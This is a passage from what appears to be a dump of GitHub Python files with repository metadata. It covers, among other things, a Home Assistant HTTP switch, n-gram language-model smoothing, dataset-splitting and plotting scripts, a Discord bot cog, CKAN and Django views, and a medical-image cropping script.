([(cp.N_h[2, 0], 2, 1.0), (cp.N_h[2, -1], 2, -1.0)], 0),\n# ([(cp.N_h[3, 0], 2, 1.0), (cp.N_h[3, -1], 2, -1.0)], 0),\n# ([(cp.N_h[3, 0], 2, 1.0), (cp.N_h[2, 0], 2, -1.0)], 0),\n# ([(cp.N_h[0, 2], 2, 1.0), (cp.N_h[-1, 2], 2, -1.0)], 0),\n# ]\n\nface_z_t = CnstrTargetFace(F=[r_, s_, -0.6 * t_ * (r_ * (1 - r_ / L_x) + s_ * (1 - s_ / L_y))])\ninit = Initialization(cp=cp, tf_lst=[(face_z_t, cp.N)], t_init=0.1)\nfold = FormFinding(source=init,\n goal_function_type='potential_energy',\n n_steps=1,\n MAX_ITER=30,\n #tf_lst=[(face_z_t, cp.N)],\n dof_constraints=fix(all_fixed, [0,1,2]) \\\n + fix(n_left_right,[0]) \\\n + fix(n_vertical_boundaries, [0,1,2]) \\\n + fix(n_horizontal_boundaries,[0,1]) \\\n + fix(n_midnode,[2],-0.5) \\\n + fix(n_i,[0]) \\\n + fix(n_midnode,[0,1])\n )\n# dof_constraints=fix([0, 1], [0], v) + fix([0, 1, 6, 7], [2]) + \\\n# fix([0], [1]) + fix([6, 7], [0], -v))\nfold.u_t[-1]\n\ncpw = CreasePatternView(root=init)\ncpw.configure_traits()\n","repo_name":"simvisage/oricrete","sub_path":"docs/use_cases/ycp02_3x5_poteng_ff_dev.py","file_name":"ycp02_3x5_poteng_ff_dev.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"19222099073","text":"from __future__ import annotations\nfrom cgitb import handler\nfrom 
cmath import e\nfrom importlib import resources\n\nimport logging\n\nimport http.client\nimport sys\nfrom logging import handlers\nfrom typing import OrderedDict\nimport voluptuous as vol\n\nfrom homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_PORT, CONF_RESOURCES\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\nDOMAIN = \"http_switch\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nDEFAULT_NAME = \"httpswitch\"\nDEFAULT_PORT = 8080\nDEFAULT_RESOURCES={}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,\n vol.Required(CONF_RESOURCES, default=DEFAULT_RESOURCES): cv.match_all,\n }\n)\n\n\ndef setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Read in all of our configuration, and initialize the loopback switch.\"\"\"\n name = config.get(CONF_NAME)\n host = config.get(CONF_HOST)\n port = config.get(CONF_PORT)\n resources = config.get(CONF_RESOURCES)\n hass.data.setdefault(DOMAIN, {})\n\n for resource, handlers in resources.items():\n add_entities([HttpResource(host, port, resource, handlers)], True)\n\n\nclass HttpResource(SwitchEntity):\n\n def __init__(self, host, port, resource, handlers):\n self._name = resource\n self._handlers = {}\n self._enabled = False\n for h in [\"turn_on\", \"turn_off\", \"update\"]:\n if h in handlers:\n self._handlers[h] = RemoteHandler(h, host, port, resource, handlers[h])\n else:\n self._handlers[h] = DummyHandler(h)\n\n @property\n def available(self):\n return True\n\n @property\n def name(self):\n \"\"\"Return the name of the switch.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return true if device is on.\"\"\"\n return self._enabled\n\n def turn_on(self, **kwargs):\n \"\"\"Turn the device on.\"\"\"\n self._handlers[sys._getframe().f_code.co_name].call()\n self._enabled = True\n return True\n\n def turn_off(self, **kwargs):\n \"\"\"Turn the device off.\"\"\"\n self._handlers[sys._getframe().f_code.co_name].call()\n self._enabled = False\n return True\n\n def update(self):\n \"\"\"Refresh state in case an alternate process modified this data.\"\"\"\n try:\n self._handlers[sys._getframe().f_code.co_name].call()\n except:\n _LOGGER.warning(\"Exception when updating state\")\n return False\n return True\n\n\nclass DummyHandler:\n\n def __init__(self, name):\n self._name = name\n\n def call(self):\n _LOGGER.debug(\"Dummy Handler %s called\", self._name)\n return True\n\n\nclass RemoteHandler:\n\n def __init__(self, name, host, port, path, cfg):\n self._name = name\n self._host = host\n self._port = port\n self._path = path\n self._cfg = cfg\n\n def call(self):\n _LOGGER.debug(\"Remote Handler %s called: %s %s %s %s\", self._name, self._host, self._port, self._path, self._cfg)\n connection = http.client.HTTPConnection(\"%s:%s\" %(self._host, self._port))\n connection.request(\"GET\", \"/%s/%s\" % (self._path, self._cfg))\n response = connection.getresponse()\n connection.close()\n _LOGGER.debug(\"Remote response %s %s\", response.getcode(), response.read().decode())\n return response.getcode() == 
200","repo_name":"majduk/raspberry-media-center","sub_path":"homeassistant/custom_components/http_switch/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3423043251","text":"from Tokenizer import *\nfrom collections import defaultdict\nimport math\nimport argparse\n\nall_kn_prob = []\n\ndef fourgram_prob(sentences,frequency_of_word,arg,verbose =False ):\n \n\n\n #divide the data into trainig and test randomly \n\n training_data_sentences = sentences[:int(len(sentences)*0.5)]\n test_data_sentences = sentences[int(len(sentences)*0.5):]\n \n fourgram_count = {}\n frequency_of_word[\"\"] = 3*len(training_data_sentences)\n frequency_of_word[\"\"] = len(training_data_sentences)\n # print(frequency_of_word[\"\"])\n vocab_size = len(frequency_of_word)\n total_words = 0\n freq_4gram = defaultdict(int)\n context_freq_4gram = defaultdict(int)\n contexts_4gram = defaultdict(set)\n discount_4gram = defaultdict(float)\n numofcontextwithfrequency_4gram = defaultdict(int)\n\n freq_3gram = defaultdict(int)\n context_freq_3gram = defaultdict(int)\n contexts_3gram = defaultdict(set)\n discount_3gram = defaultdict(float)\n numofcontextwithfrequency_3gram = defaultdict(int)\n\n freq_2gram = defaultdict(int)\n context_freq_2gram = defaultdict(int)\n contexts_2gram = defaultdict(set)\n discount_2gram = defaultdict(float)\n numofcontextwithfrequency_2gram = defaultdict(int)\n # if verbose:\n # print(\"Calculating fourgram count\")\n\n\n\n\n #data for 4-gram\n # training_data_sentences = sentences[:int(len(sentences)*0.8)]\n\n for sentence in training_data_sentences:\n\n\n # print(sentence)\n\n words = sentence.split()\n words = [''] * 3 + words + ['']\n if words[0] == ''and words[1]=='' and words[2]=='' and words[3] == '':\n #remove empty strings\n #remove words words at inde x\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n\n if(len(sentence) == 0):\n #remove emtpty sentences\n training_data_sentences.remove(sentence)\n continue\n\n\n words = [word for word in words if word != '']\n\n for i in range(len(words)-3):\n if(words[i+3] == '' or words[i+3] == ' ' or words[i+3] == None):\n words.remove(words[i+3])\n continue\n total_words +=1 \n if(words[i+3] == ''):\n continue\n context = tuple(words[i:i+3])\n word = words[i+3]\n freq_4gram[(context, word)] += 1\n context_freq_4gram[context] += 1\n contexts_4gram[context].add(word) \n \n\n #data for 3 gram\n words = sentence.split()\n words = [''] * 2 + words + ['']\n \n if words[0] == ''and words[1]=='' and words[2] == '':\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n if(len(sentence) == 0):\n continue\n # words = [word for word in words if word != '']\n for i in range(len(words)-2):\n if(words[i+2] == '' or words[i+2] == ' ' or words[i+2] == None):\n words.remove(words[i+2])\n continue\n if(words[i+2] == ''):\n continue\n context = tuple(words[i:i+2])\n word = words[i+2]\n # print(\"***************\")\n # print(context , word )\n # freq_3gram.setdefault((context, word), 0)\n freq_3gram[(context, word)] += 1\n # print(freq_3gram[(context, word)])\n context_freq_3gram[context] += 1\n contexts_3gram[context].add(word)\n\n\n\n #data for 2 gram\n words = sentence.split()\n words = [''] + words + ['']\n if words[0] == '' and words[1] == '':\n #remove empty strings\n #remove words words at inde x\n 
words.remove(words[0])\n words.remove(words[0])\n # print(words)\n\n if(len(sentence) == 0):\n continue\n\n\n \n for i in range(len(words)-1):\n if(words[i+1] == '' or words[i+1] == ' ' or words[i+1] == None):\n words.remove(words[i+1])\n continue \n if(words[i+1] == ''):\n continue\n context = tuple(words[i:i+1])\n word = words[i+1]\n freq_2gram[(context, word)] += 1\n context_freq_2gram[context] += 1\n contexts_2gram[context].add(word)\n \n \n #caclculating valuof numofcontextwithfrequency_4gram\n for context in context_freq_4gram:\n count = context_freq_4gram[context]\n numofcontextwithfrequency_4gram[count] += 1\n\n #caclculating valuof numofcontextwithfrequency_3gram\n for context in context_freq_3gram:\n count = context_freq_3gram[context]\n numofcontextwithfrequency_3gram[count] += 1\n\n #caclculating valuof numofcontextwithfrequency_2gram\n for context in context_freq_2gram:\n count = context_freq_2gram[context]\n numofcontextwithfrequency_2gram[count] += 1\n\n #calculating discount value for 4-gram\n \n \n # count = context_freq_4gram[context]\n a = numofcontextwithfrequency_4gram[1]/(numofcontextwithfrequency_4gram[1]+2*numofcontextwithfrequency_4gram[2])\n #discount value for 4-gram\n \n discount_4gram_constant = min(1 , 4 - (5*a* numofcontextwithfrequency_4gram[5]/numofcontextwithfrequency_4gram[4]))\n\n\n #calculating discount value for 3-gram\n \n b = numofcontextwithfrequency_3gram[1]/(numofcontextwithfrequency_3gram[1]+2*numofcontextwithfrequency_3gram[2])\n discount_3gram_constant = min(1 , 3 - (4*b* numofcontextwithfrequency_3gram[4]/numofcontextwithfrequency_3gram[3]))\n\n #calculating discount value for 2-gram\n c = numofcontextwithfrequency_2gram[1]/(numofcontextwithfrequency_2gram[1]+2*numofcontextwithfrequency_2gram[2])\n discount_2gram_constant = min(1 , 2 - (3*c* numofcontextwithfrequency_2gram[3]/numofcontextwithfrequency_2gram[2]))\n\n d = numofcontextwithfrequency_2gram[1]/(numofcontextwithfrequency_2gram[1]+2*numofcontextwithfrequency_2gram[2])\n discount_1gram_constant = min(1 , 1 - (2*d* numofcontextwithfrequency_2gram[2]/numofcontextwithfrequency_2gram[1]))\n #calculating discount value for 4-gram\n \n if(arg==\"kn\"):\n\n\n def kn_4gram_prob(context, word):\n numerator = max(freq_4gram[(context, word)] - discount_4gram_constant,0)\n denominator = context_freq_4gram[context]\n if denominator == 0:\n return (discount_4gram_constant/len(frequency_of_word))* kn_3gram_backoff(context[1:], word)\n lamda = len(contexts_4gram[context])*discount_4gram_constant / context_freq_4gram[context]\n return numerator/denominator + lamda *kn_3gram_backoff(context[1:], word)\n # print(context ,word)\n def kn_3gram_backoff(context, word):\n numerator = max(0 ,freq_3gram[(context, word)] - discount_3gram_constant)\n denominator = context_freq_3gram[context]\n if denominator == 0:\n return (discount_3gram_constant/len(frequency_of_word))* kn_2gram_backoff(context[1:], word)\n lamda = discount_3gram_constant*len(contexts_3gram[context]) / context_freq_3gram[context]\n return numerator/denominator + lamda *kn_2gram_backoff(context[1:], word)\n \n\n\n def kn_2gram_backoff(context, word):\n numerator = max(0,freq_2gram[(context, word)] - discount_2gram_constant)\n denominator = context_freq_2gram[context]\n if denominator == 0:\n return (discount_2gram_constant/len(frequency_of_word))* kn_1gram_backoff(word)\n lamda = discount_2gram_constant*len(contexts_2gram[context]) / context_freq_2gram[context]\n return numerator/denominator + lamda *kn_1gram_backoff(word)\n \n def 
kn_1gram_backoff( word):\n \n\n if(word not in frequency_of_word):\n return 0.000000009\n # return frequency_of_word['']/total_words\n else:\n \n return frequency_of_word[word]/total_words\n return kn_4gram_prob \n if(arg==\"wb\"):\n #written -bell smoothing\n\n def wb_4_gram(context,word):\n numerator = freq_4gram[(context, word)]\n denominator = context_freq_4gram[context] \n if denominator+ len(contexts_4gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_3gram_backoff(context[1:], word)\n g = (len(contexts_4gram[context])/((len(contexts_4gram[context])) + denominator ))\n lamda = 1 - g\n return lamda*numerator/denominator + (1-lamda)*wb_3gram_backoff(context[1:], word) \n\n\n def wb_3gram_backoff(context, word):\n numerator = freq_3gram[(context, word)]\n denominator = context_freq_3gram[context] \n if denominator + len(contexts_3gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_2gram_backoff(context[1:], word)\n lamda = 1 -(len(contexts_3gram[context])/((len(contexts_3gram[context])) + denominator ))\n return (lamda*numerator/denominator) + (1-lamda)*wb_2gram_backoff(context[1:], word)\n \n def wb_2gram_backoff(context, word):\n numerator = freq_2gram[(context, word)]\n denominator = context_freq_2gram[context] \n if denominator + len(contexts_2gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_1gram_backoff(word)\n lamda = 1 -(len(contexts_2gram[context])/((len(contexts_2gram[context])) + denominator ))\n return (lamda*numerator/denominator) + (1-lamda)*wb_1gram_backoff(word)\n\n\n def wb_1gram_backoff(word):\n c_of_word = frequency_of_word[word]\n prob_ml = c_of_word/total_words\n n_0 = len(frequency_of_word)\n prob = (prob_ml*total_words)/(total_words+ n_0) + (1/(c_of_word+n_0))\n return prob \n \n\n return wb_4_gram\n \n \n\n # def kn_recurse_backoff(context, word):\n # # print(context ,word)\n\n # if len(context) == 3:\n # return kn_4gram_prob(context, word)\n # elif len(context) == 2:\n # return kn_3gram_backoff(context, word)\n # elif len(context) == 1:\n # return kn_2gram_backoff(context, word)\n # else:\n # return kn_1gram_backoff(context, word)\n\n\n # def kn_4gram_logscore(sentence):\n \n # tokens = sentence.split()\n # padded_tokens = ['', '', ''] + tokens + ['']\n # logprob = 0.0\n # for i in range(len(padded_tokens) - 3):\n # context = tuple(padded_tokens[i:i+3])\n # token = padded_tokens[i+3]\n # logprob += math.log(kn_recurse_backoff(context, token))\n # return logprob\n # \n\n\n # def perplexity_kneser():\n # perplexity = 0\n # for sentence in training_data_sentences:\n # print(\"fd\")\n \n\n\n # hi = 0 \n # return perplexity\n \n\ndef perplexity_kn(n , tokenised_curpus ,all_probs,log_prob_kn):\n all_perplexity =[]\n for sentence in tokenised_curpus:\n per = 0\n for i in range(len(sentence)-n+1):\n if(tuple(sentence[i:i+n]) in all_probs.keys()):\n per+=log_prob_kn[tuple(sentence[i:i+n])]\n else:\n per=101\n \n per/=(len(sentence) - n+1)\n per*=-1\n per = math.exp(per)\n print(per)\n all_perplexity.append(per)\n return all_perplexity\n\ndef perplexity_wb(n , tokenised_curpus ,all_probs,log_prob_wb):\n all_perplexity =[]\n for sentence in tokenised_curpus:\n per = 0\n for i in range(len(sentence)-n+1):\n if(tuple(sentence[i:i+n]) in all_probs.keys()):\n per+=log_prob_wb[tuple(sentence[i:i+n])]\n else:\n per=101\n \n per/=(len(sentence) - n+1)\n per*=-1\n per = math.exp(per)\n print(per)\n all_perplexity.append(per)\n return all_perplexity\n\n\n\n#main function\nif __name__ == \"__main__\":\n\n\n sentences , freq , tokens = tokenize(\"Corpus/Ulysses - 
James Joyce.txt\")\n # sentences , freq , tokens = tokenize(\"sample.txt\")\n\n log_pb ={}\n log_pb_wb ={}\n f ={}\n f_wb ={}\n\n\n \n\n gram_prob=fourgram_prob(sentences,freq,\"kn\" )\n # gram_prob_wb=fourgram_prob(sentences,freq,\"wb\" )\n\n \n # print(gram_prob(('', 'i', 'like'), 'to'))\n training_data_sentences = sentences[:int(len(sentences)*0.5)]\n \n list = []\n for sentence in training_data_sentences:\n\n #make a list of list of words\n\n words = sentence.split()\n words = [''] * 3 + words + ['']\n if words[0] == ''and words[1]=='' and words[2]=='' and words[3] == '':\n #remove empty strings\n #remove words words at inde x\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n list.append(words)\n\n if(len(sentence) == 0):\n training_data_sentences.remove(sentence)\n # continue\n words = [word for word in words if word != '']\n import math \n for i in range(len(words)-3):\n if(words[i+3] == '' or words[i+3] == ' ' or words[i+3] == None):\n words.remove(words[i+3])\n continue\n if(words[i+3] == ''):\n continue\n context = tuple(words[i:i+3])\n word = words[i+3]\n # print(context,word)\n # print(gram_prob(context,word))\n list_k = []\n for k in context:\n list_k.append(k)\n list_k.append(word)\n t_kn = gram_prob(context,word)\n # t_wb = gram_prob_wb(context,word)\n\n # print(t)\n f.update({tuple(list_k):t_kn})\n # f_wb.update({tuple(list_k):t_wb})\n log_pb.update({tuple(list_k):math.log(t_kn)})\n # log_pb_wb.update({tuple(list_k):math.log(t_wb)})\n\n \n\n # prob = {\"context\":context , \"word\":word, \"probability\":gram_prob(context ,words) }\n # print(prob)\n # all_kn_prob.append(prob)\n\n\n \n # print(f.keys())\n perplexity_kn = perplexity_kn(4,list,f,log_pb)\n # perplexity_wb = perplexity_wb(4,list,f_wb,log_pb_wb)\n # print(perplexity_kn)\n print(perplexity_wb)\n print('perplexity of the corpus for kn ', sum(perplexity_kn)/len(perplexity_kn))\n # print('perplexity of the corpus for wb ', sum(perplexity_wb)/len(perplexity_wb))\n\n # print((log_pb))\n\n\n # print(gram_prob(('', '', 'gfd'), 'gfd' ))\n\n \n","repo_name":"suyashsethia/Language_modelling","sub_path":"training_language_model/fourth.py","file_name":"fourth.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74331785853","text":"from setuptools import setup, find_packages\nfrom doku import __version__\n\n\nwith open(\"README.rst\", \"r\") as f:\n long_description = f.read()\n\nsetup(name='doku',\n version=__version__,\n packages=find_packages(),\n author=\"Balazs Nadasdi\",\n author_email=\"balazs.nadasdi@cheppers.com\",\n long_description=long_description,\n url=\"https://github.com/yitsushi/doku\",\n zip_safe=True,\n include_package_data=True,\n install_requires=['click'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points=\"\"\"\n [console_scripts]\n doku = doku.main:cli\n \"\"\")\n","repo_name":"yitsushi/doku","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"28068360445","text":"import jsonlines\n\n# This script was used to split the sent retrieval dataset into 3 sets\n# because of memory error using BERT\n\ndef split_and_save_dataset(data_file, results_files):\n\n\tdata_file = 
jsonlines.open(data_file, mode=\"r\")\n\tresults_file0 = jsonlines.open(results_files[0], mode=\"w\")\n\tresults_file1 = jsonlines.open(results_files[1], mode=\"w\")\n\tresults_file2 = jsonlines.open(results_files[2], mode=\"w\")\n\tcount = 0\n\n\tfor example in data_file:\n\n\t\ttmp_dict = {}\n\n\t\ttmp_dict[\"id\"] = example[\"id\"]\n\t\ttmp_dict[\"claim\"] = example[\"claim\"]\n\t\ttmp_dict[\"true_evidence\"] = example[\"true_evidence\"]\n\t\ttmp_dict[\"claim_true_label\"] = example[\"claim_true_label\"]\n\t\t# evidence = [example[\"sentence\"], example[\"line_num\"]]\n\t\ttmp_dict[\"line_num\"] = example[\"line_num\"]\n\t\ttmp_dict[\"predicted_evidence\"] = example[\"predicted_evidence\"]\n\t\ttmp_dict[\"sentence\"] = example[\"sentence\"]\n\t\ttmp_dict[\"sent_ret_label\"] = example[\"sent_ret_label\"]\n\n\t\t# if evidence in example[\"true_evidences\"]:\n\t\t# \ttmp_dict[\"sent_ret_label\"] = 1\n\t\t# else:\n\t\t# \ttmp_dict[\"sent_ret_label\"] = 0\n\n\n\t\t\n\t\tif count < 60000:\n\t\t\tprint (\"count \", count)\n\t\t\tresults_file0.write(tmp_dict)\n\n\t\telif count >= 60000 and count < 120000:\n\t\t\tresults_file1.write(tmp_dict)\n\n\t\telse:\n\t\t\tresults_file2.write(tmp_dict)\n\n\t\tcount += 1\n\n\nif __name__ == '__main__':\n\t\n\tdata_file = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/fever_full_binary_dev_sent_ret_with_evidences.jsonl\"\n\tresults_file1 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split1.jsonl\"\n\tresults_file2 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split2.jsonl\"\n\tresults_file3 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split3.jsonl\"\n\n\tsplit_and_save_dataset(data_file, [results_file1, results_file2, results_file3])\n","repo_name":"DeFacto/EvidenceRetrieval-ClaimClassification","sub_path":"models/DeepLearningModels/bert/split_original_set.py","file_name":"split_original_set.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"2124163236","text":"import plotly.graph_objects as go #Importação do ploty\nimport numpy as np\n\n# t = np.linspace(0,10,100) # cria espaçamento igualmente dividos 100 vezes de 0 e 10\n# y= np.sin(t)\n# fig = go.Figure(data=go.Scatter(x=t, y=y, mode=\"markers\"))\n# fig.show()\n\nnp.random.seed(1)\nN = 100\nrandom_x = np.linspace(0,1,N)\nrandom_y0 = np.random.randn(N)+5\nrandom_y1 = np.random.randn(N)\nrandom_y2 = np.random.randn(N)-5\nfig = go.Figure()\nfig.add_trace(go.Scatter(x=random_x, y=random_y0, mode='markers', name = 'markers'))\nfig.add_trace(go.Scatter(x=random_x, y=random_y1, mode='lines+markers', name = 'lines+markers'))\nfig.add_trace(go.Scatter(x=random_x, y=random_y2, mode='lines', name = 'lines'))\nfig.write_html('grafico plotly.html')\nfig.show()","repo_name":"ThiagoMargoni/Senai-University-Files","sub_path":"2023.2/Big Data e IA/Plotly/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38042673439","text":"import disnake\nfrom disnake.ext import commands\n\nclass ServerIcon(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.slash_command()\n async def servericon(self, 
inter: disnake.ApplicationCommandInteraction):\n \"\"\"Get that juicy profile picture of a server\"\"\"\n embed1 = disnake.Embed()\n embed1.set_image(inter.guild.icon.url)\n await inter.response.send_message(embed=embed1)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ServerIcon(bot))","repo_name":"ShinWasTaken/casprys-maid-discordbot","sub_path":"cogs/general/servericon.py","file_name":"servericon.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71461742013","text":"# encoding: utf-8\n\"\"\"Contains the controller for KPI page.\"\"\"\n\nimport ckan.plugins as p\nfrom ckan.lib.base import BaseController\nimport stats as stats_lib\nimport ckan.lib.helpers as h\n\nfrom ckanext.kpis.plugin import show_graphs\nfrom ckanext.kpis.plugin import kpi_goals\nfrom ckanext.kpis.stats import first_date\nfrom ckanext.kpis.stats import DATE_FORMAT\n\nDUMMY_DATE = h.date_str_to_datetime(first_date.strftime(DATE_FORMAT))\n\n\nclass StatsController(BaseController):\n \"\"\"Controller for KPI pages.\"\"\"\n\n def index(self):\n \"\"\"Render the KPI index page.\"\"\"\n c = p.toolkit.c\n\n c.show_graphs = show_graphs\n c.kpi_goals = kpi_goals\n\n usage_stats = stats_lib.UsageStats()\n\n monthly_users = usage_stats.get_monthly_user_counts('all')\n c.num_users_by_month = [\n {\n 'date': h.date_str_to_datetime(month_date),\n 'users': users,\n 'percent_complete': percentage\n }\n for month_date, users, percentage in monthly_users\n ]\n if not c.num_users_by_month:\n c.num_users_by_month = [\n {\n 'date': DUMMY_DATE,\n 'users': 0,\n 'percent_complete': 0\n }\n ]\n\n weekly_datasets = usage_stats.get_dataset_counts('dataset')\n c.raw_packages_by_week = [\n {\n 'date': h.date_str_to_datetime(week_date),\n 'total_packages': cumulative_num_hits,\n 'percent_complete': percentage\n }\n for week_date, cumulative_num_hits, percentage in weekly_datasets\n ]\n if not c.raw_packages_by_week:\n c.raw_packages_by_week = [\n {\n 'date': DUMMY_DATE,\n 'total_packages': 0,\n 'percent_complete': 0\n }\n ]\n\n weekly_harvesters = usage_stats.get_dataset_counts('harvest')\n c.raw_harvesters_by_week = [\n {\n 'date': h.date_str_to_datetime(week_date),\n 'total_packages': sources,\n 'percent_complete': percentage\n }\n for week_date, sources, percentage in weekly_harvesters\n ]\n if not c.raw_harvesters_by_week:\n c.raw_harvesters_by_week = [\n {\n 'date': DUMMY_DATE,\n 'total_packages': 0,\n 'percent_complete': 0\n }\n ]\n\n return p.toolkit.render('ckanext/kpis/index.html')\n","repo_name":"NextGeoss/ckanext-kpis","sub_path":"ckanext/kpis/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41134879550","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countSort function below.\ndef countSort(arr):\n arrlen=len(arr)\n firsthalf=int(arrlen/2)\n countingArray=list()\n j=0\n for i in range(0,100):\n countingArray.append(list())\n for i in arr:\n index=int(i[0])\n element=None\n if(j -500] = 1\n mask_arr[mask_arr <= -500] = 0\n mask_arr[mask_arr >= -500] = 1 \n #print('mask_arr min and max:', np.amin(mask_arr), np.amax(mask_arr))\n centermass = ndimage.measurements.center_of_mass(mask_arr) # z,x,y \n cpoint = c - crop_shape[2]//2\n #print('cpoint, ', cpoint)\n centermass = ndimage.measurements.center_of_mass(mask_arr[cpoint, :, :]) \n 
#print('center of mass: ', centermass)\n startx = int(centermass[0] - crop_shape[0]//2)\n starty = int(centermass[1] - crop_shape[1]//2) \n #startx = x//2 - crop_shape[0]//2 \n #starty = y//2 - crop_shape[1]//2\n startz = int(c - crop_shape[2])\n #print('start X, Y, Z: ', startx, starty, startz)\n # cut bottom slices\n #image_arr = image_arr[30:, :, :]\n #label_arr = label_arr[30:, :, :]\n if startz < 0:\n img_arr = np.pad(\n img_arr,\n ((abs(startz)//2, abs(startz)//2), (0, 0), (0, 0)), \n 'constant', \n constant_values=-1024)\n seg_arr = np.pad(\n seg_arr,\n ((abs(startz)//2, abs(startz)//2), (0, 0), (0, 0)), \n 'constant', \n constant_values=0)\n img_arr_crop = img_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n seg_arr_crop = seg_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n else:\n img_arr_crop = img_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n seg_arr_crop = seg_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n # save nii\n print(img_arr_crop.shape)\n print(seg_arr_crop.shape)\n img_fn = img_crop_dir + '/' + img_id\n img = nib.Nifti1Image(img_arr_crop, np.eye(4))\n nib.save(img, img_fn)\n seg_fn = seg_crop_dir + '/' + seg_id\n seg = nib.Nifti1Image(seg_arr_crop, np.eye(4))\n nib.save(seg, seg_fn)\n\n\nif __name__ == '__main__':\n\n proj_dir = '/mnt/aertslab/USERS/Zezhong/hecktor2022/DATA2/nnUNet_raw_data_base/nnUNet_raw_data/Task500_ToySet'\n crop(proj_dir)\n\n\n \n","repo_name":"xmuyzz/HeadNeckCancer-Outcome","sub_path":"data_curation/hecktor_crop.py","file_name":"hecktor_crop.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15964920704","text":"from django.shortcuts import render, HttpResponse\n\n# Create your views here.\nfrom products.models import Products\n\n\ndef hello_world(request):\n return HttpResponse(\"Hello World\")\n\n\ndef hello_world_name(request, name):\n return HttpResponse(\"Hello World \" + name)\n\n\ndef product_list(request):\n products = Products.objects.all()\n\n return render(\n request=request,\n context={'products': products},\n template_name='products_list.html'\n )\n\n # output = \"\"\n # for product in products:\n # output += f'{product.id} | {product.name}
'\n    # return HttpResponse(output)\n\n\ndef product_details(request, id):\n    product = Products.objects.get(pk=id)\n    output = f\"Product: {product.id}<br><br>\"\n    output += f\"Name: {product.name}<br>\"\n    output += f\"Description: {product.description}<br>\"\n    output += f\"Is available: {product.is_available}<br>
\"\n\n return HttpResponse(output)\n","repo_name":"megilegi/python_bootcamp","sub_path":"zjazd_5/web/exercises/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5555069870","text":"#!/usr/bin/env python3\nfrom evolve_bf.evolve import *\n\nif __name__ == \"__main__\":\n\n cost_options = cost.default_cost_options._replace(ascii_only=True)\n\n evolve_options = default_evolve_options._replace(cost_options=cost_options, verbose=True)\n # Using _replace allows us to set only the values we actually care about.\n\n results = supervised_evolve(['Hello, world!', 'Flump.'], ['Hello, world!', 'Flump.'], evolve_options)\n\n results = supervised_evolve(['ABCDEFGHIJKLMNOPQRSTUVWXYZ'], ['abcdefghijklmnopqrstuvwxyz'], evolve_options)\n","repo_name":"NoraCodes/evolve_bf","sub_path":"test_evolve.py","file_name":"test_evolve.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36667811618","text":"from multiprocessing import Process,Manager,Pool\nimport 